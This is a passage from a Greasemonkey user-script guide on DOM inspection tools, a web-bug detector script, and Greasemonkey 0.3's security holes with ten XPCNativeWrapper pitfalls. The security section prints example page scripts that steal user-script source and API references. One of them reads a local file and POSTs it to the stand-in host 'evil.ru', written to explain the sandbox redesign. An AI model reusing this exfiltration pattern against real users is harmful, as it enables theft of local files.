DOM Inspector is included with the Firefox installation program, but depending on your platform, it might not installed by default. If you don't see a DOM Inspector item in the Tools menu, you will need to reinstall Firefox and choose Custom Install, then select Developer Tools. (Don't worry; this will not affect your existing bookmarks, preferences, extensions, or user scripts.)
A nice addition to DOM Inspector is the Inspect Element extension. It allows you to right-click on any element—a link, a paragraph, even the page itself—and open DOM Inspector with that element selected. From there, you can inspect its properties, or see exactly where it fits within the hierarchy of other elements on the page.
Tip
Download the Inspect Element extension at https://addons.update.mozilla.org/extensions/moreinfo.php?id=434.
One last note: DOM Inspector does not follow you as you browse. If you open DOM Inspector and then navigate somewhere else in the original window, DOM Inspector will get confused. It's best to go where you want to go, inspect what you want to inspect, then close DOM Inspector before doing anything else.
Test JavaScript Code Interactively
JavaScript Shell is a bookmarklet that allows you to evaluate arbitrary JavaScript expressions in the context of the current page. You install it simply by dragging it to your links toolbar. Then you can visit a web page you want to work on, and click the JavaScript Shell bookmarklet in your toolbar. The JavaScript Shell window will open in the background.
Tip
Install Javascript Shell from http://www.squarefree.com/bookmarklets/webdevel.html.
JavaScript Shell offers you the same power as DOM Inspector but in a free-form environment. Think of it as a command line for the DOM. You can enter any JavaScript expressions or commands, and you will see the output immediately. You can even make changes to the page, such as creating a new element document.createElement and adding to the page with document.body.appendChild. Your changes are reflected in the original page.
One feature of JavaScript Shell that is worth special mention is the props function. Visit http://www.oreilly.com, open JavaScript Shell, and then type the following two lines:
var link = document.getElementsByTagName('a')[0] props(link)
JavaScript Shell spews out a long list of properties:
Methods of prototype: blur, focus Fields of prototype: id, title, lang, dir, className, accessKey, charset, coords, href, hreflang, name, rel, rev, shape, tabIndex target, type, protocol, host, hostname, pathname, search, port, hash, text, offsetTop, offsetLeft, offsetWidth, offsetHeight, offsetParent, innerHTML, scrollTop, scrollLeft, scrollHeight, scrollWidth, clientHeight, clientWidth, style Methods of prototype of prototype of prototype: insertBefore, replaceChild, removeChild, appendChild, hasChildNodes, cloneNode, normalize, isSupported, hasAttributes, getAttribute, setAttribute, removeAttribute, getAttributeNode, setAttributeNode, removeAttributeNode, getElementsByTagName, getAttributeNS, setAttributeNS, removeAttributeNS, getAttributeNodeNS, setAttributeNodeNS, getElementsByTagNameNS, hasAttribute, hasAttributeNS, addEventListener, removeEventListener, dispatchEvent, compareDocumentPosition, isSameNode, lookupPrefix, isDefaultNamespace, lookupNamespaceURI, isEqualNode, getFeature, setUserData, getUserData Fields of prototype of prototype of prototype: tagName, nodeName, nodeValue, nodeType, parentNode, childNodes, firstChild, lastChild, previousSibling, nextSibling, attributes, ownerDocument, namespaceURI, prefix, localName, ELEMENT_NODE, ATTRIBUTE_NODE, TEXT_NODE, CDATA_SECTION_NODE, ENTITY_REFERENCE_NODE, ENTITY_NODE, PROCESSING_INSTRUCTION_NODE, COMMENT_NODE, DOCUMENT_NODE, DOCUMENT_TYPE_NODE, DOCUMENT_FRAGMENT_NODE, NOTATION_NODE, baseURI, textContent, DOCUMENT_POSITION_DISCONNECTED, DOCUMENT_POSITION_PRECEDING, DOCUMENT_POSITION_FOLLOWING, DOCUMENT_POSITION_CONTAINS, DOCUMENT_POSITION_CONTAINED_BY, DOCUMENT_POSITION_IMPLEMENTATION_SPECIFIC Methods of prototype of prototype of prototype of prototype of prototype: toString
What's this all about? It's a list of all the properties and methods of that <a> element that are available to you in JavaScript, grouped by levels in the DOM object hierarchy. Methods and properties that are specific to link elements (such as the blur and focus methods, and the href and hreflang properties) are listed first, followed by methods and properties shared by all types of nodes (such as the insertBefore method).
Again, this is the same information that is available in DOM Inspector—but with more typing and experimenting, and less pointing and clicking.
Tip
Like DOM Inspector, JavaScript Shell does not follow you as you browse. If you open JavaScript Shell and then navigate somewhere else in the original window, JavaScript Shell will get confused. It's best to go where you want to go, open JavaScript Shell, fiddle to your heart's content, and then close JavaScript Shell before doing anything else. Be sure to copy your code from the JavaScript Shell window and paste it into your user script once you're satisfied with it.
Embed Graphics in a User Script
Add images to web pages without hitting a remote server.
A user script is a single file. Greasemonkey does not provide any mechanism for bundling other resource files, such as image files, along with the JavaScript code. While this might offend the sensibilities of some purists who would prefer to maintain separation between code, styles, markup, and media resources, in practice, it is rarely a problem for me.
This is not to say you can't include graphics in your scripts, but you need to be a bit creative. Instead of posting the image to a web server and having your user script fetch it, you can embed the image data in the script itself by using a data: URL. A data: URL allows you to encode an image as printable text, so you can store it as a JavaScript string. And Firefox supports data: URLs natively, so you can insert the graphic directly into a web page by setting an img element's src attribute to the data: URL string. Firefox will display the image without sending a separate request to any remote server.
Tip
You can construct data: URLs from your own image files at http://software.hixie.ch/utilities/cgi/data/data.
The Code
This user script runs on all pages. It uses an XPath query to find web bugs: 1 x 1-pixel img elements that advertisers use to track your movement online. The script filters this list of potential web bugs to include only those images that point to a third-party site, since many sites use 1 x 1-pixel images for spacing in table-based layouts.
There is no way for Greasemonkey to eliminate web bugs altogether; by the time a user script executes, the image has already been fetched. But we can make them more visible by changing the src attribute of the img element after the fact. The image data is embedded in the script itself.
Save the following user script as webbugs.user.js:
// ==UserScript== // @name Web Bug Detector // @namespace http://diveintomark.org/projects/greasemonkey/ // @description make web bugs visible // @include * // ==/UserScript== var snapImages = document.evaluate("//img[@width='1'][@height='1']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); for (var i = snapImages.snapshotLength - 1; i >= 0; i--) var elmImage = snapImages.snapshotItem(i); var urlSrc = elmImage.src; var urlHost = urlSrc.replace(/^(.*?):\/\/(.*?)\/(.*)$/, "$2"); if (urlHost == window.location.host) continue; elmImage.width = '80'; elmImage.height = '80'; elmImage.title = 'Web bug detected! src="' + elmImage.src + '"'; elmImage.src = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAYAAACOEfKtAA' + 'AABHNCSVQICAgIfAhkiAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPB' + 'oAAAv3SURBVHic7Zx5kFxVGcV%2FvWVmemaSSSYxiRkSgglECJK4gAtSEjQFLmjEUhEV' + 'CxUs1NJyK5WScisKFbHUwo0q10jQABZoEJBEtgSdArNHkhCyTTKZzNo9S3dm6faPc2%2' + 'FepNP9Xvfrnu5J2afqVXq6X7%2F3vXO%2F%2By3n3g5UUUUVVVRRRRVVVFFFFVVU4Y4p' + 'lTbgTEUAmA%2F8CohU2JYzEtOBbwKDQH1lTTkVwQm%2Bfk0J7hEG5gCrgAFgYbFGlRIT' + 'TWAT0EJx064BuMBc52nzetJgognsB6YBF%2BIvAQSAZuAa4F9AG4qFkwYTTWACxa3lwP' + 'UU7olRYCbwduAp4Ih5P1wqA4vFRBOYBnqAHciLPl%2FgPRuBDwLDwEbgkHmdLq2Z%2Fh' + 'Eqwz1GgVqgA7gT6AOey%2BN7ITRdvwfcAzxh3gsC2yfCUD%2BYaA8EEdgN7AceQuVISx' + '7fiwJXI2%2F7E5AETgC7mUQeWA4CAWLI89airPo1RJAbpgHXAr9HYaAfxdS%2BCbDPNw' + '%2FlInAM6ERJ4B%2FADbiXI0FE4CvQdE8gApPASIlsCqAYeyHwfeTlBVcK5SIQREAMuB' + 'dNwVvJ3VXUAPOQlx5HU3cMDUB3kXZMAWYAVwG%2FBR43f%2B8C7qPASqGcBI4CXcBLKC' + 'm8A1iR49wpwNko41rPA4ijsqhQBFHoaAE%2BhWbBPaizuRGFiVZgPbCaAsqkctdT%2FS' + 'ie%2FRl4M%2FAdYAOnk1KPHjaOiB%2F2eb8aRNxS4L2oJKoFHjT3Pgr0mnvMQwkqiUSL' + 'j5NHsnIjcKq5QAjFiySaRinzr59MOIySQBfwU%2BBHwGXA3zPOq0MExsy9Rgu4RxANwJ' + 'tQFn8bsMhc6yHgAeAYGshONEgBc5%2F5wAHkmZ8xNrrCjcAw8DIUhy4zRtSah6vDSQwd' + 'wH9R%2FEjl8YBxROJ2c7wfTSlLUgBN4Zeb80bNvbxQj8haBaxEAgTIy34OPILiaa%2Bx' + '2w6ORZuxfz5KVH0owbjWnG4E9iCPmYG6gB3m%2FSB6yFpE8BzgQ8CXgc%2BhntWNyCQw' + 'ZB5gB3Almma2PAkjr59rHvSE2wOY714D%2FBhlbtAgPYPEh6fMtftwiMvm0SmUpMZQ%2' + 'FE2i7B%2FAZbZ5xcABFJ%2B6jKENyPsiiMBe4EXg38DFaHqsA25BnpnrxnGk1GwFPgxc' + 'DvxlnE1hROBe3ONfFHgdIi9hrrEVJapBlLF7EHmDeHtyGmhHg3YOiqFFEWgvOmSO48gD' + 'a8wRRVOnFnjSGH6TeYjbgbvRIGRiyDzQduQNq1AcTBqbapEK00vuui%2BCptudxpavoM' + 'GM4xTu4zN4Iegxdi1AuWAiiveTCKOC9CykulwF%2FBARtwf4pPk8E03A61H91QHMMu9P' + 'R3ExjfrgpizfDSLy7jbn3Y48caE5v1Q9fhQls0CuE0pRB46ikW4DDiIv%2FBtSXoZRSd' + 'ABfCPDEBsLd6FYusLYYz0LHE%2FIxEwUO28AHkZlSSfKrn3kl3TywZC5bs5lhFKrMQlz' + '0zHzuhWRsRDFuQGUZNLmnCZExuWI7EdRnL0Seee9wDZOJXEqcBHwCxSvbkGZ9jDeCccP' + 'bBlVVgGjGTgPuAR4F%2FAYDmmfwBm4eebzFIqvc1C5tNac%2Fx4U3yxqgVcjr%2B0Hrg' + 'NemXHOGY0gSiJxFPz%2FA3wJtW33IVJOoDhZi7zzrah4TaN4uQSVIGngUhxywsBinDLp' + 'W8gTvVSdMwZn43haN%2Bov%2B8zfu4BPA79GD78ZdQUJ8%2Fn4ox15Vwp1E1EUO1tQvE' + 'ujcukS5OkVRc7sUgBCaL3jDpRBN6LKvwfFt5sQEWPA%2FUBzOBx%2By4IFC0KLFy8mGo' + '0SCoUIBAKMjIywd%2B9e9uzZw%2FDwMCiAfwR4HmX2j6LB%2BCyqEduosLhaLIEtwF2o' + '5%2BxHGfdpVId1ofKlGbWCNwLT6uvrWbZsGXV1dYTD4axHIBBg9%2B7dtLa2gjxyDfAF' + 'c92bEaH78S8ylAx%2Bs3AjmpJ%2FQEH9eeDbqDXrRBnxCMq6tmcOhUKh5YsWLQJgdHT0' + '5DE2NnbK36lUiubmZmKxGPF4vBFlZIDvApvQ4lICxcXXosG5FrV0s4EXKJ3w6opCPXA%' + '2B6nc%2FhnrkBPAbFPsGUL1nJSI7tWYj6WpNfX19ePbs2ad4WyQSyemJfX19bNy40d57' + 'DfAT5JHLUYZeiVq%2BTPQjve9nqAyaMORL4BvQFHo3jmK7BRl4DCWNdnNktk7NaEVtaV' + '1dHQ0NDZ7EjSdw27ZtADtRsbwMhYMGc%2B2jwD%2BRYNCISqdFwLmoRAL16avNOTvITz' + 'HKG14Engf8DmU8iwGUTTcgsjpQMO8me0D%2FIkowhEIhIpFIXuRFIhEOHz5MZ2cn6KFt' + '15RE03g9IjaJCt0IksHsMzWgyuAcNM2XoiJ%2FCyrwn0XkF7VE4EZgANVlvxxn%2BKOo' + 'hOhFWfYo2b3Ooha1dVdkfuBGXDgcJh6P093dDSInjDTHx1GWH0Dhw6pFKTR4EaQWRc1r' + 'e6TN%2B8uRanQxas%2B6UdeTzzp1VripMQHUNg2i%2BuuvqEBOoGl7BBHpNiWa0OifBp' + 'swQJ5pyQsGgyQSCUZGTuaAl1BNuRNnda4fkdePCvMRY69deK8zttfiyPonkNc9a85bgh' + 'LgH1FB7ke1cfXAEFo5C6Asm0SFcQciMJ8bXo1iFyC1cyZ6Iiv5dnpfI21sGEbZdwOSrm' + 'Ie37Oibx3yNqtlNuLIcSnUSiaR%2BFEwvDywAZHVhZ61F7l9PoE4hBPsmY8C6hwUqBLm' + 'ggdQRZwDMTQAAyiBvAb10nfgTWDa3CaBws0URGATIrEOJbi1qNhfjjqkguBWB4aQ0HkQ' + 'PWO7MSTfyj%2BCSozrpqMs9CpE4AzzFFbos%2FMxAymk852P%2Bt91SIBdaU5fn6cdFm' + 'NoGtulURsjpqG4ugL14AXBTQ8MINcfRIE87uPaXcDYAhRw5qLWpQUJgNOR5HtW9u8%2F' + 'gLIlKIT0oDi4CRXNfkWENHqmDmNfL%2FLOA%2FhY5vUisAGl%2FhEKr59SKG71zELDPB' + 'cRNg%2FJz43mmMppwXgfKpWS5ivdSO7qRwmlBXVCxWAUzapO5J07ya5%2BuyIfDxzAX8' + '85gozcnUJD3IyU1bk4kTyIRmhcXDiA2sI2NK3sIk87IvEQzsJVsbtVR3FifAM%2BMrEX' + 'gSH87wxIG4MeO4TmzAk0bYPmgifMsc%2F5zmbg66jmG0IZ8kWUCOLoQXuQthgCfkDxgs' + 'ggInEEH78AcJvzltw0%2FlWPHuCZvbBjMyxtRKyA5k0XitrHJVFZ%2Bd7WmOej%2Bmw1' + 'jmf0mq9NRyRej6b0Op%2F2jbfTToqC4FXG2Crfr7LRjx74tgfh1gOw5FI0zAeBVti3Xz' + 'uktmPiJZKpksD7jA32M1Cs6kLR4GGkdN%2BFem0%2Fm44sxtDAFSzQehG4CU3hQvamjM' + 'coiluHga9uhdlb4YIA9KX1XifODqweFOd6UZ65wnzexqkzwE7l6aiGuxmtznnuY%2FHA' + 'EI76nbdImw%2BBtozxi%2BMoh9j1kGNpZ6XL7hnsNscICh1LkKryhHlv%2FAxIm2vOQr' + 'XgG9HaSbEEQm5BJCe8CLS7qYohMI1i2hCqoW2cGTLXzszydUiyAklR%2FVmuOYhIbAJu' + 'QwvwtmYtBgUvD%2BRDYIdvcxykcLwshKOeZEMUEb0PKTnZtoakjV1NyGM3IVXl%2FhLY' + 'WhC8ypgenMRZKrjtLbQK0EU4slmu%2B9u9OnG0PW5Vac3MD14EHiuXIQY1qF0%2BFy0T' + 'eAkXveY4jmJpOX73cgrcCByl9N7nhSjypA0o02aLf%2BMxhKMJbqECP8h2IzBb7JloNA' + 'LvRBJWjPwGsBeR2Immf1nhRmBJF1%2FyQA2S2ttRMT1%2BZc8NdkNTFxX4MXY5f%2Bbg' + 'hXrgA2jLRwzv6WsxZs61G0HLislE4Cwk1jyHkkche%2FxilGkhPROThcBatOb8CCIvX%' + '2B%2BzsAtNZd8nM1kIjKL1jg2oOyl0o2QKxc6ye%2BFk%2BOV3AP3wcC%2FyPq%2FFol' + 'yIUYH%2FEmUyeGAt2jz0JO6dhxeK0S19YzIQ2IBqTvtjmEnzY%2Bp8UGkCA0i6egFNwU' + 'oU70Wh0jEwitTnEIWXLpMClfbAqSjwx%2FCfPCqKShIYQr3vIJL3ixFt%2Fy8RRsJp9b' + '%2B0q6KKKqqooooqfOB%2F6MmP5%2BlO7YkAAAAASUVORK5CYII%3D'; }
Running the Hack
After installing the user script (Tools → Install This User Script), go to http://quicken.intuit.com/ and scroll to the bottom of the page. You will see a web bug made visible, as shown in Figure 1-10.
The graphic of the spider does not come from any server; it is embedded in the user script itself. This makes it easy to distribute a graphics-enabled Greasemonkey script without worrying that everyone who installs it will pound your server on every page request.
Avoid Common Pitfalls
Learn the history of Greasemonkey security and how it affects you now.
Once upon a time, there was a security hole. (This is not your standard fairy tale. Stay with me.) Greasemonkey's architecture has changed substantially since it was first written. Version 0.3, the first version to gain wide popularity, had a fundamental security flaw: it trusted the remote page too much when it injected and executed user scripts.
Back in those days, Greasemonkey's injection mechanism was simple, elegant…and wrong. It initialized a set of API functions as properties of the global window object, so that user scripts could call them. Then, it determined which user scripts ought to execute on the current page based on the @include and @exclude parameters. It loaded the source code of each user script, created a <Script> element, assigned the source code of the user script to the contents of the <Script> element, and inserted the element into the page. Once all the user scripts finished, Greasemonkey cleaned up the page by removing the <Script> elements it had inserted and removing the global properties it had added.
Simple and elegant, to be sure; so why was it wrong?
Security Hole #1: Source Code Leakage
The answer lies in the largely untapped power of the JavaScript language and the Document Object Model (DOM). JavaScript running in a browser is not simply a scripting language. The browser sets up a complex object hierarchy for scripts to manipulate the web page, and a complex event model to notify scripts when things happen.
This leads directly to the first security hole. When Greasemonkey 0.3 inserted a user script into a page, this triggered a DOMNodeInserted event, which the remote page could intercept. Consider a web page with the following JavaScript code. Keep in mind, this is not a user script; this is just regular JavaScript code that is part of the web page in which user scripts are executing.
<script type="text/javascript> _scripts = []; _c = document.getElementsByTagName("script").length; function trapInsertScript(event) { var doc = event.currentTarget; var arScripts = doc.getElementsByTagName("script"); if (arScripts.length > _numPreviousScripts) { _scripts.push(arScripts[_c++].innerHTML); } } document.addEventListener("DOMNodeInserted", trapInsertScript, true); </script>
Whenever Greasemonkey 0.3 injected a user script into this page (by adding a <Script> element), Firefox called the trapInsertScript function, which allowed the remote page to store a copy of the entire source code of the user script that had just been injected. Even though Greasemonkey removed the <Script> element immediately, the damage had already been done. The remote page could get a complete copy of every user script that executed on the page, and do whatever it wanted with that information.
Clearly, this is undesirable. But it gets worse.
Security Hole #2: API Leakage
The most powerful feature of Greasemonkey is not that it allows you to inject your own scripts into third-party web pages. User scripts can actually do things that regular unprivileged JavaScript cannot do, because Greasemonkey provides a set of API functions specifically for user scripts:
- GM_setValue
- Store a script-specific value in the Firefox preferences database. You can see these stored values by navigating to about:config and filtering on greasemonkey.
- GM_getValue
- Retrieve a script-specific value from the Firefox preferences database. User scripts can only access values that they have stored; they cannot access values stored by other user scripts, other browser extensions, or Firefox itself.
- GM_log
- Log a message to JavaScript Console.
- GM_registerMenuCommand
- Add a menu item to the User Script Commands menu, under the Tools menu.
- GM_xmlhttpRequest
- Get or post an HTTP request with any URL, any headers, and any data.
This last API function is obviously the most powerful. It is also the most useful, because it allows user scripts to integrate data from different sites. See Chapter 11.
JavaScript code that comes with a regular web page cannot do this. There is an XMLHttpRequest object that has some of the same capabilities, but for security reasons, Firefox intentionally restricts it to communicating with other pages on the same web site. Greasemonkey's GM_xmlhttpRequest function loosens this restriction and allows user scripts to communicate with any web site, anywhere, anytime.
All of this brings us to the second security hole. Greasemonkey 0.3 allowed remote page scripts not only to "steal" the source code of user scripts, but to steal access to Greasemonkey's API functions:
<script type="text/javascript"> _GM_xmlhttpRequest = null; function trapGM(prop, oldVal, newVal) { _GM_xmlhttpRequest = window.GM_xmlhttpRequest; return newVal; } window.watch("GM_log", trapGM); </script>
Using the watch method, available on every JavaScript object, the web page would wait for Greasemonkey 0.3 to add the GM_log function to the window object. As long as at least one user script executed on the page, this would always happen, immediately before Greasemonkey inserted the <Script> element that ran the user script. When Greasemonkey assigned the window.GM_log property, Firefox would call the trapGM function set up by the remote page, which could steal a reference to window.GM_xmlhttpRequest and store it for later use.
The user script would execute as usual, and Greasemonkey would clean up after itself by removing the API functions from the window object. But the damage had already been done. The remote page still retained a reference to the GM_xmlhttpRequest function, and it could use this function reference to do things that ordinary JavaScript code is not supposed to be able to do.
Security experts call this a privilege escalation attack. In effect, Greasemonkey 0.3 circumvented all the careful planning that went into sandboxing unprivileged JavaScript code, and allowed unprivileged code to gain access to privileged functions.
But wait; it gets worse.
Security Hole #3: Local File Access
Greasemonkey 0.3 had one more fatal flaw. By issuing a GET request on a file:// URL that pointed to a local file, user scripts could access and read the contents of any file on your hard drive. This is disturbing by itself, but it is especially dangerous when coupled with leaking API functions to remote page scripts. The combination of these security holes meant that a remote page script could steal a reference to the GM_xmlhttpRequest function, call it to read any file on your hard drive, and then call it again to post the contents of that file anywhere in the world:
<script type="text/javascript"> // _GM_xmlhttpRequest was captured earlier, // via security hole #2 _GM_xmlhttpRequest({ method: "GET", url: "file:///c:/boot.ini", onload: function(oResponseDetails) { _GM_xmlhttpRequest({ method: "POST", url: "http://evil.ru/", data: oResponseDetails.responseText }); } }); </script>
Redesigning from the Ground Up
All of these problems in Greasemonkey 0.3 stem from one fundamental architectural flaw: it trusts its environment too much. By design, user scripts execute in a hostile environment, an arbitrary web page under someone else's control. We want to execute semitrusted, semiprivileged code within that environment, but we don't want to leak that trust or those privileges to potentially hostile code.
The solution is to set up a safe environment where we can execute user scripts. The sandbox needs access to certain parts of the hostile environment (like the DOM of the web page), but it should never allow malicious page scripts to interfere with user scripts, or intercept references to privileged functions. The sandbox should be a one-way street, allowing user scripts to manipulate the page but never the other way around.
Greasemonkey 0.5 executes user scripts in a sandbox. It never injects a <Script> element into the original page, nor does it define its API functions on the global window object. Remote page scripts never have a chance to intercept user scripts, because user scripts execute without ever modifying the page.
But this is only half the battle. User scripts might need to call functions in order to manipulate the web page. This includes DOM methods such as document.getElementsByTagName and document.createElement, as well as global functions such as window.alert and window.getComputedStyle. A malicious web page could redefine these functions to prevent the user script from working properly, or to make it do something else altogether.
To solve this second problem, Greasemonkey 0.5 uses a little-known Firefox feature called XPCNativeWrappers. Instead of simply referencing the window object or the document object, Greasemonkey redefines these to be XPCNativeWrappers. An XPCNativeWrapper wraps a reference to the actual object, but doesn't allow the underlying object to redefine methods or intercept properties. This means that when a user script calls document.createElement, it is guaranteed to be the real createElement method, not some random method that was redefined by the remote page.
Going Deeper
In Greasemonkey 0.5, the sandbox in which user scripts execute defines the window and document objects as deep XPCNativeWrappers. This means that not only is it safe to call their methods and access their properties, but it is also safe to access the methods and properties of the objects they return.
For example, you want to write a user script that calls the document.getElementsByTagName function, and then you want to loop through the elements it returns:
var arTextareas = document.getElementsByTagName('textarea'); for (var i = arTextareas.length - 1; i >= 0; i--) { var elmTextarea = arTextareas[i]; elmTextarea.value = my_function(elmTextarea.value); }
The document object is an XPCNativeWrapper of the real document object, so your user script can call document.getElementsByTagName and know that it's calling the real getElementsByTagName method. But what about the collection of element objects that the method returns? All these elements are also XPCNativeWrappers, which means it is also safe to access their properties and methods (such as the value property).
What about the collection itself? The document.getElementsByTagName function normally returns an HTMLCollection object. This object has properties such as length and special getter methods that allow you to treat it like a JavaScript Array. But it's not an Array; it's an object. In the context of a user script, this object is also wrapped by an XPCNativeWrapper, which means that you can access its length property and know that you're getting the real length property and not calling some malicious getter function that was redefined by the remote page.
All of this is confusing but extremely important. This example user script looks exactly the same as JavaScript code you would write as part of a regular web page, and it ends up doing exactly the same thing. But you need to understand that, in the context of a user script, everything is wrapped in an XPCNativeWrapper. The document object, the HTMLCollection, and each Element are all XPCNativeWrappers around their respective objects.
Greasemonkey 0.5 goes to great lengths to allow you to write what appears to be regular JavaScript code, and have it do what you would expect regular JavaScript code to do. But the illusion is not perfect. XPCNativeWrappers have some limitations that you need to be aware of. There are 10 common pitfalls to writing Greasemonkey scripts, and all of them revolve around limitations of XPCNativeWrappers.
Pitfall #1: Auto-eval Strings
In places where you want to set up a callback function (such as window.setTimeout to run a function after a delay), JavaScript allows you to define the callback as a string. When it's time to execute the callback, Firefox evaluates the string and executes it. This leads to our first pitfall.
Assuming a user script defines a function called my_func, this code looks like it will execute my_func() after a one-second delay:
window.setTimeout("my_func()", 1000);
This doesn't work in a Greasemonkey script; the my_func function will never execute. By the time the callback executes one second later, the user script and its entire sandbox have disappeared. The window.setTimeout function will try to evaluate the JavaScript code in the context of the page as it exists one second later, but the page doesn't include the my_func function. In fact, it never included the my_func function; that function only ever existed within the Greasemonkey sandbox.
This doesn't mean you can never use timeouts, though. You just need to set them up differently. Here is the same code, but written in a way that works in the context of a user script:
window.setTimeout(my_func, 1000);
What's the difference? The my_func function is referenced directly, as an object instead of a string. You are passing a function reference to the window.setTimeout function, which will store the reference until it is time to execute it. When the time comes, it can still call the my_func function, because JavaScript keeps the function's environment alive as long as something, somewhere is holding a reference to it.
Pitfall #2: Event Handlers
Another common pattern in JavaScript is setting event handlers, such as onclick, onchange, or onsubmit. The most common way to set up an onclick event handler is to assign a string to an element's onclick property:
var elmLink = document.getElementById('somelink'); elmLink.onclick = 'my_func(this)';
This technique fails in a user script for the same reason the first window.setTimeout call failed. By the time the user clicks the link, the my_func function defined elsewhere in the user script will no longer exist.
OK, let's try setting the onclick callback directly:
var elmLink = document.getElementById('somelink'); elmLink.onclick = my_func;
This also fails, but for a completely different reason. The document.getElementById function returns an XPCNativeWrapper around an Element object, not the element itself. That means that setting elmLink.onclick to a function reference sets a property not on the element, but on the XPCNativeWrapper. With most properties, such as id or className, the XPCNativeWrapper will turn around and set the corresponding property on the underlying element. But due to limitations of how XPCNativeWrappers are implemented, this pass-through does not work with event handlers such as onclick. This example code will not set the corresponding onclick handler on the actual element, and when you click the link, my_func will not execute.
This doesn't mean you can't set event handlers, just that you can't set them in the obvious way. The only technique that works is the addEventListener method:
var elmLink = document.getElementById('somelink'); elmLink.addEventListener("click", my_func, true);
This technique works with all elements, as well as the window and document objects. It works with all DOM events, including click, change, submit, keypress, mousemove, and so on. It works with existing elements on the page that you find by calling document.getElementsByTagName or document.getElementById, and it works with new elements you create dynamically by calling document.createElement. It is the only way to set event handlers that works in the context in which user scripts operate.
Pitfall #3: Named Forms and Form Elements
Firefox lets you access elements on a web page in a variety of ways. For example, if you had a form named gs that contained an input box named q:
<form id="gs"> <input name="q" type="text" value="foo"> </form>
you could ordinarily get the value of the input box like this:
var q = document.gs.q.value;
In a user script, this doesn't work. The document object is an XPCNativeWrapper, and it does not support the shorthand of getting an element by ID. This means document.gs is undefined, so the rest of the statement fails. But even if the document wrapper did support getting an element by ID, the statement would still fail because XPCNativeWrappers around form elements don't support the shorthand of getting form fields by name. This means that even if document.gs returned the form element, document.gs.q would not return the input element, so the statement would still fail.
To work around this, you need to use the namedItem method of the document.forms array to access forms by name, and the elements array of the form element to access the form's fields:
var form = document.forms.namedItem("gs"); var input = form.elements.namedItem("q"); var q = input.value;
You could squeeze this into one line instead of using temporary variables for the form and the input elements, but you still need to call each of these methods and string the return values together. There are no shortcuts.
Pitfall #4: Custom Properties
JavaScript allows you to define custom properties on any object, just by assigning them. This capability extends to elements on a web page, where you can make up arbitrary attributes and assign them directly to the element's DOM object.
var elmFoo = document.getElementById('foo'); elmFoo.myProperty = 'bar';
This doesn't work in Greasemonkey scripts, because elmFoo is really an XPCNativeWrapper around the element named foo, and XPCNativeWrappers don't let you define custom attributes with this syntax. You can set common attributes like id or href, but if you want to define your own custom attributes, you need to use the setAttribute method:
var elmFoo = document.getElementById('foo'); elmFoo.setAttribute('myProperty', 'bar');
If you want to access this property later, you will need to use the getAttribute method:
var foo = elmFoo.getAttribute('myProperty');
Pitfall #5: Iterating Collections
Normally, DOM methods such as document.getElementsByTagName return an HTMLCollection object. This object acts much like a JavaScript Array object.
It has a length property that returns the number of elements in the collection, and it allows you to iterate through the elements in the collection with the in keyword:
var arInputs = document.getElementsByTagName("input"); for (var elmInput in arInputs) { … }
This doesn't work in Greasemonkey scripts because the arInputs object is an XPCNativeWrapper around an HTMLCollection object, and XPCNativeWrappers do not support the in keyword. Instead, you need to iterate through the collection with a for loop, and get a reference to each element separately:
for (var i = 0; i < arInputs.length; i++) var elmInput = arInputs[i]; … }
Pitfall #6: scrollIntoView
In the context of a regular web page, you can manipulate the viewport to scroll the page programmatically. For example, this code will find the page element named foo and scroll the browser window to make the element visible on screen:
var elmFoo = document.getElementById('foo'); elmFoo.scrollIntoView();
This does not work in Greasemonkey scripts, because elmFoo is an XPCNativeWrapper, and XPCNativeWrappers do not call the scrollIntoView method on the underlying wrapped element. Instead, you need to use the special wrappedJSObject property of the XPCNativeWrapper object to get a reference to the real element, and then call its scrollIntoView method:
var elmFoo = document.getElementById('foo'); var elmUnderlyingFoo = elmFoo.wrappedJSObject || elmFoo; elmUnderlyingFoo.scrollIntoView();
It is important to note that this is vulnerable to a malicious remote page redefining the scrollIntoView method to do something other than scrolling the viewport. There is no general solution to this problem.
Pitfall #7: location
There are several ways for regular JavaScript code to work with the current page's URL. The window.location object contains information about the current URL, including href (the full URL), hostname (the domain name), and pathname (the part of the URL after the domain name). You can programmatically move to a new page by setting window.location.href to another URL. But there is also shorthand for this. The window.location object defines its href attribute as a default property, which means that you can move to a new page simply by setting window.location:
window.location = "http://example.com/";
In regular JavaScript code, this sets the window.location.href property, which jumps to the new page. But in Greasemonkey scripts, this doesn't work, because the window object is an XPCNativeWrapper, and XPCNativeWrappers don't support setting the default properties of the wrapped object. This means that setting window.location in a Greasemonkey script will not actually jump to a new page. Instead, you need to explicitly set window.location.href:
window.location.href = "http://example.com/";
This also applies to the document.location object.
Pitfall #8: Calling Remote Page Scripts
Occasionally, a user script needs to call a function defined by the remote page. For example, there are several Greasemonkey scripts that integrate with Gmail (http://mail.google.com), Google's web mail service. Gmail is heavily dependent on JavaScript, and user scripts that wish to extend it frequently need to call functions that the original page has defined:
var searchForm = getNode("s"); searchForm.elements.namedItem("q").value = this.getRunnableQuery(); top.js._MH_OnSearch(window, 0);
The original page scripts don't expect to get XPCNativeWrappers as parameters. Here, the _MH_OnSearch function defined by the original page expects the real window as its first argument, not an XPCNativeWrapper around the window. To solve this problem, Greasemonkey defines a special variable, unsafeWindow, which is a reference to the actual window object:
var searchForm = getNode("s"); searchForm.elements.namedItem("q").value = this.getRunnableQuery(); top.js._MH_OnSearch(unsafeWindow, 0);
It's called unsafeWindow for a reason: its properties and methods could be redefined by the page to do virtually anything. You should never call methods on unsafeWindow unless you completely trust the remote page not to mess with you. You should only ever use it as a parameter to call functions defined by the original page, or to watch window properties as shown in the next section.
Greasemonkey also defines unsafeDocument, which is the actual document object. As with unsafeWindow, you should never use it except to pass it as a parameter to page scripts that expect the actual document object.
Pitfall #9: watch
Earlier in this hack, I mentioned the watch method, which is available on every JavaScript object. It allows you to intercept assignments to an object's properties. For instance, you could set up a watch on the window.location object to watch for scripts that tried to navigate to a new page programmatically:
window.watch("location", watchLocation); window.location.watch("href", watchLocation);
In the context of a user script, this will not work. You need to set the watch on the unsafeWindow object:
unsafeWindow.watch("location", watchLocation); unsafeWindow.location.watch("href", watchLocation);
Note that this is still vulnerable to a malicious page redefining the watch method itself. There is no general solution to this problem.
Pitfall #10: style
In JavaScript, every element has a style attribute with which you can get and set the element's CSS styles. Firefox also supports a shorthand method for setting multiple styles at once:
